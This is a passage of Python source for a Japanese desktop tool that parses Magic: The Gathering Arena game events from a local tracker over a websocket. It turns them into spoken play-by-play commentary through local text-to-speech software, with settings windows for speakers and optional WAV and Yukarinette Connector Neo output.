PUT_INTO_GRAVEYARD = (Event.PUT_INTO_GRAVEYARD, "カードが墓地に置かれた時:")
CONJURE = (Event.CONJURE, "カードが創出された時:")
class ProcessName:
ASSISTANT_SEIKA = "AssistantSeika.exe"
MTGATRACKER_BACKEND = "mtgatracker_backend.exe"
SEIKA_SAY2 = "SeikaSay2.exe"
class CommentaryBackend(tkinter.Frame):
def __init__(self, master=None):
super().__init__(master)
# 定数
self.CONFIG_FILE = "config\\config.json"
self.DEFAULT_SPEAKER_FILE = "config\\defaultSpeaker.json"
self.LOG_FILE = os.path.basename(__file__).split(".")[0]+".log"
self.BAT_FOR_WAV_FILE = "WAVファイル出力_{}.bat".format(datetime.now().strftime('%Y%m%d_%H%M%S'))
self.WAV_OUTPUT_DIR = os.getcwd()+"\\wav"
# 変数
self.config = {
ConfigKey.SEIKA_SAY2_PATH : ".\\"+ProcessName.SEIKA_SAY2,
ConfigKey.SPEAKER1 : {
ConfigKey.CID : 0,
ConfigKey.NAME : ""
},
ConfigKey.SPEAKER2 : {
ConfigKey.CID : 0,
ConfigKey.NAME : ""
},
ConfigKey.HERO_COMMENTARY_TYPE : ConfigValue.SPEAKER1,
ConfigKey.OPPONENT_COMMENTARY_TYPE : ConfigValue.SPEAKER1,
ConfigKey.MTGATRACKER_BACKEND_URL : "ws://localhost:8089",
ConfigKey.WAV_OUTPUT : False,
ConfigKey.YUKARINETTE_CONNECTOR_NEO : False,
ConfigKey.YUKARINETTE_CONNECTOR_NEO_URL : "http://localhost:15520/api/input?text="
}
self.cids = []
self.speakers = []
self.speaker1_obj = {}
self.speaker2_obj = {}
self.hero_screen_name = ""
self.opponent_screen_name = ""
self.HERO_COMMENTARY_TYPES = ["話者1が一人称で実況する", "実況しない"]
self.OPPONENT_COMMENTARY_TYPES = ["話者1が三人称で実況する", "話者2が一人称で実況する", "実況しない"]
self.WAV_OUTPUT = ["WAVファイルを出力しない", "WAVファイル出力用batファイルを作成する"]
self.YUKARINETTE_CONNECTOR_NEO = ["連携しない", "ゆかりねっとコネクター Neoに実況内容を連携する"]
# GUI
self.master.title("MTGA自動実況ツール")
self.master.geometry("600x360")
self.master_frame = tkinter.Frame(self.master)
self.master_frame.pack()
self.master_text = ScrolledText(self.master_frame, state='disabled')
self.master_text.pack()
self.master_quit = tkinter.Button(self.master_frame, text=" 終了 ", command=self.master_frame_quit)
self.master_quit.pack(fill='x', padx=10, pady=5, side = 'right')
self.master_save = tkinter.Button(self.master_frame, text=" 保存 ", command=self.master_frame_save)
self.master_save.pack(fill='x', padx=10, pady=5, side = 'right')
# logger
self.logger = logging.getLogger(__name__)
self.logger.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setLevel(logging.INFO)
must_rollover = False
if os.path.exists(self.LOG_FILE): # check before creating the handler, which creates the file
must_rollover = True
rotating_handler = logging.handlers.RotatingFileHandler(self.LOG_FILE, backupCount=10)
rotating_handler.setLevel(logging.DEBUG)
if must_rollover:
try:
rotating_handler.doRollover()
except PermissionError:
print("警告: {} のローテーションに失敗しました。ログファイルが出力されません。".format(self.LOG_FILE))
self.logger.addHandler(stream_handler)
self.logger.addHandler(rotating_handler)
# load config
self.logger.info("Loading {}".format(self.CONFIG_FILE))
if self.load_config():
self.logger.info("Loading {}: OK".format(self.CONFIG_FILE))
else:
self.logger.info("Loading {}: NG".format(self.CONFIG_FILE))
def master_frame_save(self):
filename = "MTGA自動実況_{}.txt".format(datetime.now().strftime('%Y%m%d_%H%M%S'))
path = filedialog.asksaveasfilename(filetype=[("テキストファイル","*.txt")], initialdir=os.getcwd(), initialfile=filename)
if path:
with open(path, 'a', encoding="utf_8_sig") as af:
af.write(self.master_text.get("1.0","end"))
def master_frame_quit(self):
if messagebox.askyesno("終了確認", "終了してよろしいですか?"):
self.master.destroy()
def start_ws_client(self):
import threading
t = threading.Thread(target=self.connect_to_socket)
t.start()
def connect_to_socket(self):
websocket.enableTrace(False)
self.ws = websocket.WebSocketApp(self.config.get(ConfigKey.MTGATRACKER_BACKEND_URL),
on_open = self.on_open,
on_message = self.on_message,
on_error = self.on_error,
on_close = self.on_close)
self.ws.run_forever()
def start_http_client(self, url):
import threading
t = threading.Thread(target=self.connect_to_yukarinette_conecctor_neo, args=(url,))
t.start()
def connect_to_yukarinette_conecctor_neo(self, url):
urllib.request.urlopen(url=url)
def load_config(self, config_file=None):
if not config_file:
config_file = self.CONFIG_FILE
if not os.path.exists(config_file):
self.save_config(config_file, self.config)
with open(config_file if config_file else self.CONFIG_FILE, 'r', encoding="utf_8_sig") as rf:
self.config = json.load(rf)
if self.config.get(ConfigKey.WAV_OUTPUT) is None:
self.config[ConfigKey.WAV_OUTPUT] = False
if self.config.get(ConfigKey.YUKARINETTE_CONNECTOR_NEO) is None:
self.config[ConfigKey.YUKARINETTE_CONNECTOR_NEO] = False
if self.config.get(ConfigKey.YUKARINETTE_CONNECTOR_NEO_URL) is None:
self.config[ConfigKey.YUKARINETTE_CONNECTOR_NEO_URL] = "http://localhost:15520/api/input?text="
return self.config
def save_config(self, config_file=None, config=None):
with open(config_file if config_file else self.CONFIG_FILE, 'w', encoding="utf_8_sig") as wf:
json.dump(config if config else self.config, wf, indent=4, ensure_ascii=False)
def open_config_window(self):
speaker1_index = self.cids.index(self.config.get(ConfigKey.SPEAKER1).get(ConfigKey.CID))
speaker2_index = self.cids.index(self.config.get(ConfigKey.SPEAKER2).get(ConfigKey.CID))
self.config_window = tkinter.Toplevel(self)
self.config_window.title("MTGA自動実況ツール - 設定ウィンドウ")
self.config_window.geometry("500x250")
self.config_window.grab_set() # モーダルにする
self.config_window.focus_set() # フォーカスを新しいウィンドウをへ移す
self.config_window.transient(self.master) # タスクバーに表示しない
self.config_frame = ttk.Frame(self.config_window)
self.config_frame.grid(column=0, row=0, sticky=tkinter.NSEW, padx=5, pady=5)
self.sv_seikasay2_path = tkinter.StringVar()
self.sv_seikasay2_path.set(self.config.get(ConfigKey.SEIKA_SAY2_PATH))
self.sv_speaker1 = tkinter.StringVar()
self.sv_speaker2 = tkinter.StringVar()
self.sv_hero_commentary_type = tkinter.StringVar()
self.sv_opponent_commentary_type = tkinter.StringVar()
self.sv_wav_output = tkinter.StringVar()
self.sv_yukarinette_connector_neo = tkinter.StringVar()
button_seikasay2 = tkinter.Button(self.config_frame, text=" 参照 ", command=self.config_window_seikasay2)
button_seikasay2.grid(row=0, column=2, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
label_speaker1 = ttk.Label(self.config_frame, text="話者1: ", anchor="w")
label_speaker1.grid(row=0, column=0, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
combobox_speaker1 = ttk.Combobox(self.config_frame, width=40, values=self.speakers, textvariable=self.sv_speaker1, state="readonly")
combobox_speaker1.current(speaker1_index)
combobox_speaker1.grid(row=0, column=1, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
button_speaker1 = tkinter.Button(self.config_frame, text=" 編集 ", command=lambda: self.open_speaker_window(self.sv_speaker1.get().split(" ")[0]))
button_speaker1.grid(row=0, column=2, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
label_speaker2 = ttk.Label(self.config_frame, text="話者2: ", anchor="w")
label_speaker2.grid(row=1, column=0, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
combobox_speaker2 = ttk.Combobox(self.config_frame, width=40, values=self.speakers, textvariable=self.sv_speaker2, state="readonly")
combobox_speaker2.current(speaker2_index)
combobox_speaker2.grid(row=1, column=1, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
button_speaker2 = tkinter.Button(self.config_frame, text=" 編集 ", command=lambda: self.open_speaker_window(self.sv_speaker2.get().split(" ")[0]))
button_speaker2.grid(row=1, column=2, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
label_hero_commentary_type = ttk.Label(self.config_frame, text="自分のアクション: ", anchor="w")
label_hero_commentary_type.grid(row=2, column=0, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
combobox_hero_commentary_type = ttk.Combobox(self.config_frame, width=40, values=self.HERO_COMMENTARY_TYPES, textvariable=self.sv_hero_commentary_type, state="readonly")
combobox_hero_commentary_type.current(0 if self.config.get(ConfigKey.HERO_COMMENTARY_TYPE) == ConfigValue.SPEAKER1 else 1)
combobox_hero_commentary_type.grid(row=2, column=1, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
label_opponent_commentary_type = ttk.Label(self.config_frame, text="対戦相手のアクション: ", anchor="w")
label_opponent_commentary_type.grid(row=3, column=0, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
combobox_opponent_commentary_type = ttk.Combobox(self.config_frame, width=40, values=self.OPPONENT_COMMENTARY_TYPES, textvariable=self.sv_opponent_commentary_type, state="readonly")
combobox_opponent_commentary_type.current(0 if self.config.get(ConfigKey.OPPONENT_COMMENTARY_TYPE) == ConfigValue.SPEAKER1 else 1 if self.config.get(ConfigKey.OPPONENT_COMMENTARY_TYPE) == ConfigValue.SPEAKER2 else 2)
combobox_opponent_commentary_type.grid(row=3, column=1, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
label_wav_output = ttk.Label(self.config_frame, text="WAVファイル出力: ", anchor="w")
label_wav_output.grid(row=4, column=0, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
combobox_wav_output = ttk.Combobox(self.config_frame, width=40, values=self.WAV_OUTPUT, textvariable=self.sv_wav_output, state="readonly")
combobox_wav_output.current(0 if not self.config.get(ConfigKey.WAV_OUTPUT) else 1)
combobox_wav_output.grid(row=4, column=1, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
label_yukarinette_connector_neo = ttk.Label(self.config_frame, text="ゆかりねっとコネクター Neo: ", anchor="w")
label_yukarinette_connector_neo.grid(row=5, column=0, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
combobox_yukarinette_connector_neo = ttk.Combobox(self.config_frame, width=40, values=self.YUKARINETTE_CONNECTOR_NEO, textvariable=self.sv_yukarinette_connector_neo, state="readonly")
combobox_yukarinette_connector_neo.current(0 if not self.config.get(ConfigKey.YUKARINETTE_CONNECTOR_NEO) else 1)
combobox_yukarinette_connector_neo.grid(row=5, column=1, sticky=tkinter.W + tkinter.E, padx=5, pady=5)
button_ok = tkinter.Button(self.config_frame, text=" 開始 ", command=self.config_window_ok)
button_ok.grid(row=6, column=2, sticky=tkinter.E, padx=5, pady=10)
self.wait_window(self.config_window)
def config_window_seikasay2(self):
path = filedialog.askopenfilename(filetype=[("実行ファイル","*.exe")], initialdir=os.getcwd())
if path:
self.sv_seikasay2_path.set(path)
def config_window_ok(self):
self.config[ConfigKey.SEIKA_SAY2_PATH] = self.sv_seikasay2_path.get()
self.config[ConfigKey.SPEAKER1][ConfigKey.CID] = self.sv_speaker1.get().split(" ")[0]
self.config[ConfigKey.SPEAKER1][ConfigKey.NAME] = self.sv_speaker1.get()
self.config[ConfigKey.SPEAKER2][ConfigKey.CID] = self.sv_speaker2.get().split(" ")[0]
self.config[ConfigKey.SPEAKER2][ConfigKey.NAME] = self.sv_speaker2.get()
self.config[ConfigKey.HERO_COMMENTARY_TYPE] = \
ConfigValue.SPEAKER1 if self.sv_hero_commentary_type.get() == self.HERO_COMMENTARY_TYPES[0] \
else ConfigValue.NEVER
self.config[ConfigKey.OPPONENT_COMMENTARY_TYPE] = \
ConfigValue.SPEAKER1 if self.sv_opponent_commentary_type.get() == self.OPPONENT_COMMENTARY_TYPES[0] \
else ConfigValue.SPEAKER2 if self.sv_opponent_commentary_type.get() == self.OPPONENT_COMMENTARY_TYPES[1] \
else ConfigValue.NEVER
self.config[ConfigKey.WAV_OUTPUT] = False if self.sv_wav_output.get() == self.WAV_OUTPUT[0] else True
self.config[ConfigKey.YUKARINETTE_CONNECTOR_NEO] = False if self.sv_yukarinette_connector_neo.get() == self.YUKARINETTE_CONNECTOR_NEO[0] else True
self.save_config()
self.config_window.destroy()
def config_window_cancel(self):
self.config_window.destroy()
def open_speaker1_window(self):
self.open_speaker_window(self.sv_speaker1.get().split(" ")[0])
def open_speaker2_window(self):
self.open_speaker_window(self.sv_speaker2.get().split(" ")[0])
def get_speak_obj(self, speakers, event):
for obj in speakers:
if obj.get(SpeakerKey.EVENT) == event:
return obj.get(SpeakerKey.SPEAK)
return None
def open_speaker_window(self, cid):
speakers = self.load_speaker(cid)
self.speaker_window = tkinter.Toplevel(self.config_window)
self.speaker_window.title("MTGA自動実況ツール - 話者ウィンドウ - {}".format(self.get_speaker_name(cid)))
self.speaker_window.geometry("940x600")
self.speaker_window.grab_set() # モーダルにする
self.speaker_window.focus_set() # フォーカスを新しいウィンドウをへ移す
self.speaker_window.transient(self.master) # タスクバーに表示しない
self.speaker_frame = ttk.Frame(self.speaker_window)
self.speaker_frame.grid(column=0, row=0, sticky=tkinter.NSEW, padx=5, pady=5)
label1 = ttk.Label(self.speaker_frame, text="自分のアクション(一人称)", anchor="w")
label1.grid(row=0, column=1, sticky=tkinter.W + tkinter.E, padx=4, pady=2)
label2 = ttk.Label(self.speaker_frame, text="対戦相手のアクション(三人称)", anchor="w")
label2.grid(row=0, column=2, sticky=tkinter.W + tkinter.E, padx=4, pady=2)
label3 = ttk.Label(self.speaker_frame, text="対戦相手のアクション(一人称)", anchor="w")
label3.grid(row=0, column=3, sticky=tkinter.W + tkinter.E, padx=4, pady=2)
labels = {}
svs = {}
entrys = {}
i = 1
for key in SpeakerWindowEntry:
labels[key.name] = ttk.Label(self.speaker_frame, text=key.value[1], anchor="w")
labels[key.name].grid(row=i, column=0, sticky=tkinter.W + tkinter.E, padx=4, pady=2)
svs[key.name] = []
entrys[key.name] = []
for j in range(3):
svs[key.name].append(StringVar())
svs[key.name][j].set(self.get_speak_obj(speakers, key.value[0])[j].get(SpeakerKey.TEXT))
entrys[key.name].append(ttk.Entry(self.speaker_frame, width=40, textvariable=svs[key.name][j]))
entrys[key.name][j].grid(row=i, column=j+1, sticky=tkinter.W + tkinter.E, padx=4, pady=2)
if j > 0 and key.value[0] in [Event.GAME_START, Event.GAME_WIN, Event.GAME_LOSE, Event.MULLIGAN_CHECK]:
entrys[key.name][j].config(state='disabled')
i += 1
button_ok = tkinter.Button(self.speaker_frame, text="保存して閉じる", command=lambda: self.speaker_window_ok(cid, speakers, svs))
button_ok.grid(row=i, column=2, sticky=tkinter.W + tkinter.E, padx=4, pady=10)
button_cancel = tkinter.Button(self.speaker_frame, text="保存しないで閉じる", command=self.speaker_window_cancel)
button_cancel.grid(row=i, column=3, sticky=tkinter.W + tkinter.E, padx=4, pady=10)
self.wait_window(self.speaker_window)
def speaker_window_ok(self, cid, speakers, svs):
for key in SpeakerWindowEntry:
for j in range(3):
self.get_speak_obj(speakers, key.value[0])[j][SpeakerKey.TEXT] = svs[key.name][j].get()
self.save_speaker(cid, speakers)
self.speaker_window.destroy()
def speaker_window_cancel(self):
self.speaker_window.destroy()
def load_speaker(self, cid):
speaker_file = "config\\{}.json".format(cid)
if not os.path.isfile(speaker_file):
speaker_file = self.DEFAULT_SPEAKER_FILE
with open(speaker_file, 'r', encoding="utf_8_sig") as rf:
return json.load(rf)
def save_speaker(self, cid, speaker):
speaker_file = "config\\{}.json".format(cid)
with open(speaker_file, 'w', encoding="utf_8_sig") as wf:
json.dump(speaker, wf, ensure_ascii=False)
def del_ruby(self, s):
return re.sub("(.+?)", "", re.sub("<.+?>", "", s))
def parse(self, blob):
self.logger.debug(blob)
if blob:
text_array = blob.get(MessageKey.GAME_HISTORY_EVENT)
if not text_array:
return None
parsed = {}
if len(text_array) == 0:
self.logger.warning("warning: 長さ0のtext_array")
elif len(text_array) == 1:
if text_array[0].get(MessageKey.TYPE) == MessageValue.GAME: # ゲーム終了 {"text": "screenName won!", "type": "game"}
parsed[ParseKey.MESSAGE_TYPE] = text_array[0].get(MessageKey.TYPE)
if text_array[0].get(MessageKey.TEXT).startswith(self.hero_screen_name):
parsed[ParseKey.EVENT] = Event.GAME_WIN
else:
parsed[ParseKey.EVENT] = Event.GAME_LOSE
elif text_array[0].get(MessageKey.TYPE) == MessageValue.TURN: # ターン開始 { "text": "N / screenName Turn M", "type": "turn" }
if text_array[0].get(MessageKey.TEXT).find(self.opponent_screen_name) >= 0:
parsed[ParseKey.IS_OPPONENT] = True
parsed[ParseKey.MESSAGE_TYPE] = text_array[0].get(MessageKey.TYPE)
parsed[ParseKey.EVENT] = Event.TURN_START
else:
self.logger.warning("warning: 不明なtype: {}".format(text_array[0].get(MessageKey.TYPE)))
else:
parsed[ParseKey.VERB] = text_array[1].strip()
# 動詞が"'s"の場合はガチャガチャする
if parsed.get(ParseKey.VERB) == "'s": # { "text": カード名, "type": hero/opponent }, "'s ", { "text": ability, "type": "ability"}, ...
parsed[ParseKey.SOURCE] = text_array[0].get(MessageKey.TEXT)
parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
parsed[ParseKey.MESSAGE_TYPE] = text_array[2].get(MessageKey.TYPE) # ability
# ":"が入らない場合は"'s'"の直後を主語にする
if len(text_array) >= 4 and text_array[3].strip() != ":": # ex: "CARDNAME1 's ability exiles CARDNAME2"
text_array = text_array[2:]
# ":"が入る場合は":"の直後を主語にする
elif len(text_array) >= 6 and text_array[3].strip() == ":": # ex: "CARDNAME1 's ability : SCREENNAME draws CARDNAME2"
text_array = text_array[4:]
parsed[ParseKey.VERB] = text_array[1].strip()
# 動詞が":"の場合は":"の直後を主語にする
if parsed.get(ParseKey.VERB) == ":": # { "text": カード名, "type": "opponent" }, ": ", { "text": screenName, "type": "opponent" }, ...
parsed[ParseKey.SOURCE] = text_array[0].get(MessageKey.TEXT)
if len(text_array) >= 4: # ex: "CARDNAME1 : SCREENNAME draws CARDNAME2"
text_array = text_array[2:]
parsed[ParseKey.VERB] = text_array[1].strip()
if parsed.get(ParseKey.VERB) == Verb.ATTAKING: # 攻撃クリーチャー指定時 { "text": カード名, "type": hero/opponent }, " attacking"
parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
parsed[ParseKey.ATTACKER] = self.del_ruby(text_array[0].get(MessageKey.TEXT))
parsed[ParseKey.CARD] = parsed[ParseKey.ATTACKER] # 念のため
parsed[ParseKey.EVENT] = Event.ATTACK
elif parsed.get(ParseKey.VERB) == Verb.BLOCKS:
parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
parsed[ParseKey.BLOCKER] = self.del_ruby(text_array[0].get(MessageKey.TEXT))
parsed[ParseKey.ATTACKER] = self.del_ruby(text_array[2].get(MessageKey.TEXT))
parsed[ParseKey.CARD] = parsed[ParseKey.BLOCKER] # 念のため
parsed[ParseKey.SOURCE] = parsed[ParseKey.BLOCKER] # 念のため
parsed[ParseKey.TARGET] = parsed[ParseKey.ATTACKER] # 念のため
parsed[ParseKey.EVENT] = Event.BLOCK
elif parsed.get(ParseKey.VERB) == Verb.CASTS:
parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
parsed[ParseKey.CARD] = self.del_ruby(text_array[2].get(MessageKey.TEXT))
parsed[ParseKey.EVENT] = Event.CAST_SPELL
elif parsed.get(ParseKey.VERB) == Verb.COUNTERS:
parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
parsed[ParseKey.SOURCE] = self.del_ruby(text_array[0].get(MessageKey.TEXT))
parsed[ParseKey.TARGET] = self.del_ruby(text_array[2].get(MessageKey.TEXT))
parsed[ParseKey.CARD] = parsed[ParseKey.TARGET] # 念のため
parsed[ParseKey.EVENT] = Event.COUNTERED
elif parsed.get(ParseKey.VERB) == Verb.DRAWS:
parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
if len(text_array) >= 3:
parsed[ParseKey.CARD] = self.del_ruby(text_array[2].get(MessageKey.TEXT))
parsed[ParseKey.TARGET] = parsed[ParseKey.CARD] # 念のため
parsed[ParseKey.EVENT] = Event.DRAW
elif parsed.get(ParseKey.VERB) == Verb.EXILES:
parsed[ParseKey.IS_OPPONENT] = True if text_array[2].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
parsed[ParseKey.CARD] = self.del_ruby(text_array[2].get(MessageKey.TEXT))
parsed[ParseKey.TARGET] = parsed[ParseKey.CARD] # 念のため
parsed[ParseKey.EVENT] = Event.EXILE
elif parsed.get(ParseKey.VERB) == Verb.LIFE_TOTAL_CHANGED:
parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
parsed[ParseKey.LIFE_FROM] = int(text_array[2].split(" -> ")[0])
parsed[ParseKey.LIFE_TO] = int(text_array[2].split(" -> ")[1])
parsed[ParseKey.SOURCE] = parsed[ParseKey.LIFE_FROM] # 念のため
parsed[ParseKey.TARGET] = parsed[ParseKey.LIFE_TO] # 念のため
parsed[ParseKey.EVENT] = Event.LIFE_GAIN if parsed[ParseKey.LIFE_FROM] < parsed[ParseKey.LIFE_TO] else Event.LIFE_LOSE
parsed[ParseKey.LIFE_DIFF] = abs(parsed[ParseKey.LIFE_TO] - parsed[ParseKey.LIFE_FROM])
elif parsed.get(ParseKey.VERB) == Verb.PLAYS:
parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
parsed[ParseKey.CARD] = self.del_ruby(text_array[2].get(MessageKey.TEXT))
parsed[ParseKey.TARGET] = parsed[ParseKey.CARD] # 念のため
parsed[ParseKey.EVENT] = Event.PLAY_LAND
elif parsed.get(ParseKey.VERB) == Verb.RESOLVES:
parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
parsed[ParseKey.CARD] = self.del_ruby(text_array[0].get(MessageKey.TEXT))
parsed[ParseKey.TARGET] = parsed[ParseKey.CARD] # 念のため
parsed[ParseKey.EVENT] = Event.RESOLVE
elif parsed.get(ParseKey.VERB) == Verb.SENT_TO_GRAVEYARD:
parsed[ParseKey.IS_OPPONENT] = True if text_array[0].get(MessageKey.TYPE) == MessageValue.OPPONENT else False
parsed[ParseKey.CARD] = self.del_ruby(text_array[0].get(MessageKey.TEXT))
parsed[ParseKey.TARGET] = parsed[ParseKey.CARD] # 念のため
parsed[ParseKey.REASON] = text_array[2]
if parsed.get(ParseKey.REASON) in [Reason.SBA_DAMEGE, Reason.SBA_DEATHTOUCH, Reason.SBA_ZERO_TOUGHNESS]: # 死亡(致死ダメージ、接死ダメージ、タフネス0未満)
parsed[ParseKey.EVENT] = Event.DIE
elif parsed.get(ParseKey.REASON) in [Reason.DESTROY]: # 破壊
parsed[ParseKey.EVENT] = Event.DESTROY
elif parsed.get(ParseKey.REASON) in [Reason.SACRIFICE]: # 生け贄
parsed[ParseKey.EVENT] = Event.SACRIFICE
elif parsed.get(ParseKey.REASON) in [Reason.CONJURE]: # 創出
parsed[ParseKey.EVENT] = Event.CONJURE
elif parsed.get(ParseKey.REASON) in [Reason.DISCARD]: # ディスカード
parsed[ParseKey.EVENT] = Event.DISCARD
elif parsed.get(ParseKey.REASON) in [Reason.MILL, Reason.PUT, Reason.SBA_UNATTACHED_AURA, Reason.NIL]: # 墓地に置く(切削、墓地にカードを置く効果、不正オーラ、対象不適正呪文)
parsed[ParseKey.EVENT] = Event.PUT_INTO_GRAVEYARD
else:
self.logger.warning("warning: 不明なreason: {}".format(parsed.get(ParseKey.REASON)))
elif parsed.get(ParseKey.VERB) == Verb.STARTING_HAND:
parsed[ParseKey.EVENT] = Event.MULLIGAN_CHECK
elif parsed.get(ParseKey.VERB) == Verb.VS:
self.hero_screen_name = text_array[0].get(MessageKey.TEXT)
self.opponent_screen_name = text_array[2].get(MessageKey.TEXT)
parsed[ParseKey.SOURCE] = self.hero_screen_name # なんとなく
parsed[ParseKey.TARGET] = self.opponent_screen_name # なんとなく
parsed[ParseKey.EVENT] = Event.GAME_START
else:
self.logger.warning("warning: 不明なverb: {}".format(parsed.get(ParseKey.VERB)))
return parsed
else:
return None
def gen_text(self, parsed):
if not parsed.get(ParseKey.IS_OPPONENT):
if self.config.get(ConfigKey.HERO_COMMENTARY_TYPE) == ConfigValue.SPEAKER1:
cid = self.config.get(ConfigKey.SPEAKER1).get(ConfigKey.CID)
speaker = self.speaker1_obj
speak_idx = 0
else:
return None
else:
if self.config.get(ConfigKey.OPPONENT_COMMENTARY_TYPE) == ConfigValue.SPEAKER1:
cid = self.config.get(ConfigKey.SPEAKER1).get(ConfigKey.CID)
speaker = self.speaker1_obj
speak_idx = 1
elif self.config.get(ConfigKey.OPPONENT_COMMENTARY_TYPE) == ConfigValue.SPEAKER2:
cid = self.config.get(ConfigKey.SPEAKER2).get(ConfigKey.CID)
speaker = self.speaker2_obj
speak_idx = 2
else:
return None
speak_obj = None
for obj in speaker:
if obj.get(SpeakerKey.EVENT) == parsed.get(ParseKey.EVENT):
speak_obj = obj.get(SpeakerKey.SPEAK)[speak_idx]
break
text = speak_obj.get(SpeakerKey.TEXT)
for word in ReplaceWord:
text = text.replace("{"+word.value+"}", str(parsed.get(word.value)) if str(parsed.get(word.value)) else "")
speak_param_obj = {}
for obj in speaker:
if obj.get(SpeakerKey.TYPE) == SpeakerValue.SEIKA_SAY2:
speak_param_obj = obj
break
if not speak_param_obj:
speak_param_obj[SpeakerParamKey.ASYNC] = speak_obj.get(SpeakerParamKey.ASYNC) if speak_obj.get(SpeakerParamKey.ASYNC) else speak_param_obj.get(SpeakerParamKey.ASYNC)
speak_param_obj[SpeakerParamKey.VOLUME] = speak_obj.get(SpeakerParamKey.VOLUME) if speak_obj.get(SpeakerParamKey.VOLUME) else speak_param_obj.get(SpeakerParamKey.VOLUME)
speak_param_obj[SpeakerParamKey.SPEED] = speak_obj.get(SpeakerParamKey.SPEED) if speak_obj.get(SpeakerParamKey.SPEED) else speak_param_obj.get(SpeakerParamKey.SPEED)
speak_param_obj[SpeakerParamKey.PITCH] = speak_obj.get(SpeakerParamKey.PITCH) if speak_obj.get(SpeakerParamKey.PITCH) else speak_param_obj.get(SpeakerParamKey.PITCH)
speak_param_obj[SpeakerParamKey.ALPHA] = speak_obj.get(SpeakerParamKey.ALPHA) if speak_obj.get(SpeakerParamKey.ALPHA) else speak_param_obj.get(SpeakerParamKey.ALPHA)
speak_param_obj[SpeakerParamKey.INTONATION] = speak_obj.get(SpeakerParamKey.INTONATION) if speak_obj.get(SpeakerParamKey.INTONATION) else speak_param_obj.get(SpeakerParamKey.INTONATION)
speak_param_obj[SpeakerParamKey.EMOTION_EP] = speak_obj.get(SpeakerParamKey.EMOTION_EP) if speak_obj.get(SpeakerParamKey.EMOTION_EP) else speak_param_obj.get(SpeakerParamKey.EMOTION_EP)
speak_param_obj[SpeakerParamKey.EMOTION_P] = speak_obj.get(SpeakerParamKey.EMOTION_P) if speak_obj.get(SpeakerParamKey.EMOTION_P) else speak_param_obj.get(SpeakerParamKey.EMOTION_P)
speak_param_obj[SpeakerParamKey.OVER_BANNER] = speak_obj.get(SpeakerParamKey.OVER_BANNER) if speak_obj.get(SpeakerParamKey.OVER_BANNER) else speak_param_obj.get(SpeakerParamKey.OVER_BANNER)
else:
speak_param_obj[SpeakerParamKey.ASYNC] = speak_obj.get(SpeakerParamKey.ASYNC)
speak_param_obj[SpeakerParamKey.VOLUME] = speak_obj.get(SpeakerParamKey.VOLUME)
speak_param_obj[SpeakerParamKey.SPEED] = speak_obj.get(SpeakerParamKey.SPEED)
speak_param_obj[SpeakerParamKey.PITCH] = speak_obj.get(SpeakerParamKey.PITCH)
speak_param_obj[SpeakerParamKey.ALPHA] = speak_obj.get(SpeakerParamKey.ALPHA)
speak_param_obj[SpeakerParamKey.INTONATION] = speak_obj.get(SpeakerParamKey.INTONATION)
speak_param_obj[SpeakerParamKey.EMOTION_EP] = speak_obj.get(SpeakerParamKey.EMOTION_EP)
speak_param_obj[SpeakerParamKey.EMOTION_P] = speak_obj.get(SpeakerParamKey.EMOTION_P)
speak_param_obj[SpeakerParamKey.OVER_BANNER] = speak_obj.get(SpeakerParamKey.OVER_BANNER)
return cid, text, speak_param_obj
def get_speaker_list(self):
self.cids, self.speakers = self.seikasay2.list()
return self.cids, self.speakers
def get_speaker_name(self, cid):
for speaker in self.speakers:
if speaker.startswith(cid):
try:
return re.sub("^"+cid, "", speaker).split(" - ")[0].strip()
except:
return None
return None
def speak(self, cid, text, speak_param_obj={}, save=True):
if cid and text:
if self.config.get(ConfigKey.YUKARINETTE_CONNECTOR_NEO) and save:
# ゆかりねっとコネクター Neoに発話内容を連携
self.start_http_client(self.config.get(ConfigKey.YUKARINETTE_CONNECTOR_NEO_URL) + urllib.parse.quote(text))
speaked_text = self.seikasay2.speak( \
cid=cid, \
text=text, \
asynchronize=speak_param_obj.get(SpeakerParamKey.ASYNC), \
volume=speak_param_obj.get(SpeakerParamKey.VOLUME), \
speed=speak_param_obj.get(SpeakerParamKey.SPEED), \
pitch=speak_param_obj.get(SpeakerParamKey.PITCH), \
alpha=speak_param_obj.get(SpeakerParamKey.ALPHA), \
intonation=speak_param_obj.get(SpeakerParamKey.INTONATION), \
emotionEP=speak_param_obj.get(SpeakerParamKey.EMOTION_EP), \
emotionP=speak_param_obj.get(SpeakerParamKey.EMOTION_P), \
overBanner=speak_param_obj.get(SpeakerParamKey.OVER_BANNER) \
)
if self.config.get(ConfigKey.WAV_OUTPUT) and save:
cmd = self.seikasay2.get_speak_command( \
cid=cid, \
text=text, \
asynchronize=speak_param_obj.get(SpeakerParamKey.ASYNC), \
